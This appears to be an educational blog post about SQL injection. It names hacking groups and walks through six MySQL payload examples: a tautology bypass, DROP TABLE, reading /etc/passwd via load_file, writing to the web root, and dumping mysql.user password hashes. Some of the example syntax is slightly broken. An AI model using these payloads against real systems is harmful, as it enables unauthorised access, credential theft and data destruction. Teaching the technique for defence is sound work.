SQL Injection – Still a favorite technique among hackers

Hacking groups and the most common technique they use (“SQL Injection”)

Once consigned to those shadows of the computer underground, hacking has become a common practice! The news of Cyber security breaches manage to make it to the daily newsfeed of some country each day. With household names like LulzSec and Anonymous gaining more popularity than ever, it has become paramount to acquaint ourselves with the most common technique used to prey on the easy dupes- “SQL Injection”. But first things first, here’s a list of the most high profile hacking groups and techniques implemented by them to exploit the virtual security vulnerabilities.

  • Global KOS: With a goal of creating an “online disorder”, this group has provided a slew of hacker tools to wreak havoc on the cyber world. They incorporated a “denial of services” tool in their strategy to hack websites of several politicians as well as MTV in the year 1996.
  • Anonymous: Creating a literal “Inferno” in the virtual industry, this amorphous group of hackers planned a “denial of service” attack on those who had objections over online piracy.
  • LulzSec: The group went on a hacking spree for 50 days by using SQL injection, RFI and XSS to exploit the flawed security of a whole gamut of companies like Sony, FBI and the CIA.

A plethora of other hacking groups such as the Chaos Computer Club, Masters of Deception and GlobalHell have emerged in the past few years, with their focus on decrypting confidential data and deceiving the online users using SQL Injections.

SQL Injection- A favorite tool of the ‘Online Rogues’

SQL injection, simply put, is a hacking technique used to exploit the security vulnerability of a web application and dump the contents to the attacker. It is one of the most cherished techniques employed by attackers against database-driven applications. A widely accepted reason for the same is that SQL Injections are unbeknownst to the common people as a potential threat to their security. Also they do not demand a prior training or software downloads, making it wieldy even for amateurs.

Methodology Involved

For a hacker driven by the need of vanity and vandalism, understanding the technical science involved in an SQL injection is not a Herculean task. Two popular methods of SQL Injection are described below:

 Merged queries


If a software entity or a website entails a vulnerability (existing due to an improper way of collecting input from user or interacting with database via SQL), it gets very easy for a hacker to ‘insert’ an arbitrary SQL code piece for server execution. This compromises the natural integrity of the database in HTML form and culminates in jeopardized outputs.

 Unions


Another popular way of SQL script injection entails the use of website URLs. Commonly known as “Unions”, this method can be implemented in Linux servers (that use MySQL and PHP) by attaching SQL queries in the URL of a web page in a particular session. If the hacker is already aware of the variables used like ‘user_ID’, he can inject the SQL codes directly. Conversely, he may use the trial and hit method due to the common nomenclature conventions such as ‘userNames’, ‘userTable’ etc.

Examples

Example 1 – List all users


Original query

HTTP Request  : get_users.php?userid=1234
Original query: "select * from users WHERE id = 1234";
Modified query (“Merged”)
HTTP Request  : get_users.php?userid=1234 OR 1=1
Executed query: "select * from users WHERE key = 1234 OR 1=1";        // 1 will always be 1

Example 2 – List all users


Original query
HTTP Request  : get_users.php?key=ABCD
Original query: "select * from users WHERE key = 'ABCD'";
Modified query (“Merged”)
HTTP Request  : get_users.php?key=ABCD' OR key LIKE '%
Executed query: "select * from users WHERE key = 'ABCD' OR key LIKE '%'"; // % means anything

Example 3 – Eliminate table


Original query
HTTP Request  : get_users.php?key=ABCD;
Original query: "select * from users WHERE key = 'ABCD'";
Modified query (“Merged”)
HTTP Request  : get_users.php?key=ABCD';DROP TABLE users;
Executed query: "select * from users WHERE key = 'ABCD'; DROP TABLE users; --' // -- specifies comment

Example 4 – Read from local filesystem


Original query
HTTP Request  : get_users.php?key=ABCD;
Original query: "select * from users WHERE key = 'ABCD'";
Modified query (“Union”)
HTTP Request  : get_users.php?key=ABCD'+UNION+SELECT+1,+load_file(/etc/passwd); -- + is equal to space
Executed query: "select * from users WHERE key = 'ABCD' UNION SELECT 1, load_file(/etc/passwd); --'

Example 5 – Write to local filesystem


Original query
HTTP Request  : get_users.php?key=ABCD;
Original query: "select * from users WHERE key = 'ABCD'";
Modified query (“Union”)
HTTP Request  : get_users.php?key=ABCD'+UNION+SELECT+*+FROM+´users´+INTO+dumpfile+'/var/www/htdocs/data'; -- 
Executed query: "select * from users WHERE key = 'ABCD' UNION SELECT 1, SELECT * FROM ´users´ INTO dumpfile ‘/var/www/htdocs/data’;

Example 6 – Dump database user accounts


Original query

HTTP Request  : get_users.php?key=ABCD;
Original query: "select * from users WHERE key = 'ABCD'";

Modified query (“Union”)

HTTP Request  : get_users.php?key=ABCD'+UNION+SELECT+1,+SELECT+host,+user,+password+FROM+mysql.user; -- + is equal to space
Executed query: "select * from users WHERE key = 'ABCD' UNION SELECT 1, SELECT host, user, password FROM mysql.user;

Try it out

Most people learns best from doing – not reading. Try it out yourself in the simulator at the following URL :

http://login.spktools.com/

 Useful arguments

  • “UNION ALL” and “Joins” – can be used to fetch data from other tables
  • “load_file” – can be used to load and execute a file if that’s allowed
  • “information_schema.tables” – contains names of all tables

Other databases

The commands in this article applies to MySQL. Other databases such as PostgreSQL, MSQL and Oracle might have different syntax.

Example of recent SQL Injection attack

                LulSecThe group targeted the entertainment channel Sony’s website (www.sonypictures.com) and compromised passwords of a million users along with their personal information in 2011. With one SQL injection it stole admin details including passwords and music codes.

References

https://www.google.se/#q=lulzsec+sql+injection

http://en.wikipedia.org/wiki/SQL_injection

http://www.otrs.com/security-advisory-2014-02-sql-injection-issue/

http://www.javacodegeeks.com/2013/12/using-sql-injection-vulnerabilities-to-dump-your-database.html

http://chemicalengineeringnews.org/hacking-techniques-sql-injections/

http://dev.mysql.com/doc/refman/5.7/en/

Images:

http://kz-cert.kz/en/presscenter/certnews/?news=150